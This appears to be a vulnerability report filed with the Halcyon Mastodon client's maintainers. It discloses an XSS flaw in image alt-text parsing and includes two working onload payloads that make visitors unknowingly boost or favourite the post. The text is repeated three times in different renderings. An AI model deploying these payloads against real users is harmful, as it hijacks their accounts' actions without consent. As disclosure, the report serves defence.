The parser for alt text (or, title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the img element I want, such as class and onload, where I can place arbitrary JS.
Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack.
Here's an example of the alt text that one can specify for an image that will create a self-boosting post.
this is an image of some kind "class="xss" onload="let reboostBtnXSS = $('.xss').parents('.toot_content').find('.boost_button'); if (reboostBtnXSS.attr('reblogged') == 'false') reboostBtnXSS.click(); alert('XSS in Halcyon')"
If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text, they would find that they have boosted it without their knowledge.
Here's the version for a self-favouriting post, which I have tested privately.
this is an image of some kind "class="xss" onload="let favBtnXSS = $('.xss').parents('.toot_content').find('.fav_button'); if (favBtnXSS.attr('favourited') == 'false') favBtnXSS.click(); alert('self-favourited post')"
I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.
The parser for alt text (or, title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the `img` element I want, such as `class` and `onload`, where I can place arbitrary JS.
Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack.
Here's an example of the alt text that one can specify for an image that will create a self-boosting post.
```
this is an image of some kind "class="xss" onload="let reboostBtnXSS = $('.xss').parents('.toot_content').find('.boost_button'); if (reboostBtnXSS.attr('reblogged') == 'false') reboostBtnXSS.click(); alert('XSS in Halcyon')"
```
If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text, they would find that they have boosted it without their knowledge.
Here's the version for a self-favouriting post, which I have tested privately.
```
this is an image of some kind "class="xss" onload="let favBtnXSS = $('.xss').parents('.toot_content').find('.fav_button'); if (favBtnXSS.attr('favourited') == 'false') favBtnXSS.click(); alert('self-favourited post')"
```
I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.
The parser for alt text (or, title text, to be specific) has an injection vulnerability; quotation marks are not escaped. This makes it possible to specify any attribute to the
img
element I want, such asclass
andonload
, where I can place arbitrary JS.Tested with a private post, I was able to create a self-favouriting post (which can be easily adapted to be self-boosting) that also presents a dialog box informing the visitor of the XSS attack.
Here's an example of the alt text that one can specify for an image that will create a self-boosting post.
If one were to then post that (publicly, to enable the boost button), anyone using the Halcyon client who loads that post containing an image with that as its alt text, they would find that they have boosted it without their knowledge.
Here's the version for a self-favouriting post, which I have tested privately.
I know this repository hasn't been updated in a while, but I am hoping you will still respond to security vulnerabilities.